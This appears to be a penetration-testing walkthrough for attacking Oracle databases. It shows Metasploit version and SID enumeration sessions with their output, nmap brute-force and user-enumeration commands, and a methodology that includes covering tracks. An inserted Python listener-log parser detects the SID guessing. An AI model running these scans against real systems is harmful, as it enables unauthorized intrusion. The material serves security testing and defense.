Oracle Attack Methodology

1. Locate Oracle Version
2. Determine Oracle Version
3. Determine Oracle SID
4. Guess/Bruteforce USER/PASS
5. Privilege Escalation via SQL Injection
6. Manipulate Data/Post Exploitation
7. Cover Tracks


++++++++++++++++++++++++++++++++++Determine Oracle Version
msf > use auxiliary/scanner/oracle/
use auxiliary/scanner/oracle/emc_sid            use auxiliary/scanner/oracle/sid_enum
use auxiliary/scanner/oracle/isqlplus_login     use auxiliary/scanner/oracle/spy_sid
use auxiliary/scanner/oracle/isqlplus_sidbrute  use auxiliary/scanner/oracle/tnslsnr_version
use auxiliary/scanner/oracle/oracle_hashdump    use auxiliary/scanner/oracle/xdb_sid
use auxiliary/scanner/oracle/oracle_login       use auxiliary/scanner/oracle/xdb_sid_brute
use auxiliary/scanner/oracle/sid_brute          
msf > use auxiliary/scanner/oracle/tnslsnr_version
msf auxiliary(tnslsnr_version) > show options

Module options (auxiliary/scanner/oracle/tnslsnr_version):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOSTS                    yes       The target address range or CIDR identifier
   RPORT    1521             yes       The target port
   THREADS  1                yes       The number of concurrent threads

msf auxiliary(tnslsnr_version) > set RHOSTS 192.168.1.100
RHOSTS => 192.168.1.100
msf auxiliary(tnslsnr_version) > run

[+] 192.168.1.100:1521 Oracle - Version: 32-bit Windows: Version 9.2.0.1.0 - Production
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed


++++++++++++++++++++++++++++++++++Determine Oracle SID
msf auxiliary(tnslsnr_version) > use auxiliary/scanner/oracle/sid_enum
msf auxiliary(sid_enum) > set RHOSTS 192.168.1.100
RHOSTS => 192.168.1.100
msf auxiliary(sid_enum) > set THREADS 8
THREADS => 8
msf auxiliary(sid_enum) > show options

Module options (auxiliary/scanner/oracle/sid_enum):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOSTS   192.168.1.100    yes       The target address range or CIDR identifier
   RPORT    1521             yes       The target port
   THREADS  8                yes       The number of concurrent threads

msf auxiliary(sid_enum) > run

[+] Identified SID for 192.168.1.100:1521 ["PLSExtProc"]
[+] Identified SID for 192.168.1.100:1521 ["dbnis"]
[*] Identified SERVICE_NAME for 192.168.1.100:1521 ["PLSExtProc"]
[*] Identified SERVICE_NAME for 192.168.1.100:1521 ["dbnis"]
[*] Identified SERVICE_NAME for 192.168.1.100:1521 ["dbnisXDB"]
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
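
Seen from the database host, the listener version query and SID guessing above can leave entries in the listener log. The following is an added example, not part of the original post: it parses constructed lines in the classic text listener.log layout (an assumption about how the listener logs) and reports sources that request several unknown SIDs, plus listener commands such as version. The function name, threshold and sample addresses are hypothetical.

```python
import re
from collections import defaultdict

# Constructed sample in the classic text listener.log layout (an assumption):
# TIMESTAMP * CONNECT_DATA [* PROTOCOL_INFO] * EVENT [* SID] * RETURN_CODE
SAMPLE_LOG = """\
06-DEC-2013 10:01:02 * (CONNECT_DATA=(CID=(PROGRAM=)(HOST=)(USER=))(COMMAND=version)(ARGUMENTS=64)(SERVICE=LISTENER)) * version * 0
06-DEC-2013 10:01:05 * (CONNECT_DATA=(SID=ORCL)(CID=(PROGRAM=)(HOST=)(USER=))) * (ADDRESS=(PROTOCOL=tcp)(HOST=192.168.1.50)(PORT=40001)) * establish * ORCL * 12505
06-DEC-2013 10:01:05 * (CONNECT_DATA=(SID=XE)(CID=(PROGRAM=)(HOST=)(USER=))) * (ADDRESS=(PROTOCOL=tcp)(HOST=192.168.1.50)(PORT=40002)) * establish * XE * 12505
06-DEC-2013 10:01:06 * (CONNECT_DATA=(SID=TEST)(CID=(PROGRAM=)(HOST=)(USER=))) * (ADDRESS=(PROTOCOL=tcp)(HOST=192.168.1.50)(PORT=40003)) * establish * TEST * 12505
06-DEC-2013 10:01:06 * (CONNECT_DATA=(SID=dbnis)(CID=(PROGRAM=)(HOST=)(USER=))) * (ADDRESS=(PROTOCOL=tcp)(HOST=192.168.1.50)(PORT=40004)) * establish * dbnis * 0
06-DEC-2013 10:07:41 * (CONNECT_DATA=(SID=dbniz)(CID=(PROGRAM=sqlplus)(HOST=app01)(USER=ops))) * (ADDRESS=(PROTOCOL=tcp)(HOST=192.168.1.20)(PORT=51512)) * establish * dbniz * 12505
"""

UNKNOWN = {12505, 12514}  # TNS-12505: unknown SID, TNS-12514: unknown service name
ESTABLISH = re.compile(
    r"\(HOST=(?P<src>[^)]+)\)\(PORT=\d+\)\) \* establish \* (?P<sid>\S+) \* (?P<rc>\d+)$")
COMMAND = re.compile(r"\(COMMAND=(?P<cmd>\w+)\).* \* (?P=cmd) \* (?P<rc>\d+)$")

def analyze(log_text, min_unknown=3):
    """Return (sources that guessed >= min_unknown unknown SIDs, listener commands seen)."""
    unknown, valid, commands = defaultdict(set), defaultdict(set), []
    for line in log_text.splitlines():
        line = line.rstrip()
        m = ESTABLISH.search(line)
        if m:
            rc = int(m["rc"])
            if rc in UNKNOWN:
                unknown[m["src"]].add(m["sid"])   # rejected SID or service name
            elif rc == 0:
                valid[m["src"]].add(m["sid"])     # accepted: a guess may have landed
            continue
        m = COMMAND.search(line)
        if m:
            # Record when a listener command (version, status, services) was served.
            commands.append((line.split(" * ", 1)[0], m["cmd"]))
    guessing = {src: {"unknown": sorted(sids), "valid": sorted(valid[src])}
                for src, sids in unknown.items() if len(sids) >= min_unknown}
    return guessing, commands

if __name__ == "__main__":
    print(analyze(SAMPLE_LOG))
```

A source listed with a non-empty "valid" entry is the one to look at first: it requested unknown SIDs and also reached a real one. A single mistyped SID, like the one from 192.168.1.20 in the sample, stays below the threshold.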

................

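Once the SID has been obtained, the next step is to try guessing the Oracle user/password. If a username is obtained successfully, you can try logging in and escalating privileges. For a detailed description of the above, see the PDF linked below.

When Metasploit does password guessing, it calls nmap scripts. The Oracle-related scripts available in nmap are shown below: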

root@gnu:~# ls -l /usr/share/nmap/scripts/*oracle*
-rw-r--r-- 1 root root 7159 Dec  6  2013 /usr/share/nmap/scripts/oracle-brute.nse
-rw-r--r-- 1 root root 6465 Dec  6  2013 /usr/share/nmap/scripts/oracle-brute-stealth.nse
-rw-r--r-- 1 root root 4615 Dec  6  2013 /usr/share/nmap/scripts/oracle-enum-users.nse
-rw-r--r-- 1 root root 4892 Dec  6  2013 /usr/share/nmap/scripts/oracle-sid-brute.nse


nmap --script oracle-enum-users --script-args oracle-enum-users.sid=dbnis,userdb=oracle_default_users.txt -p 1521 192.168.1.100 


References:

http://pentestlab.wordpress.com/category/information-gathering/
http://www.blackhat.com/presentations/bh-usa-09/GATES/BHUSA09-Gates-OracleMetasploit-SLIDES.pdf
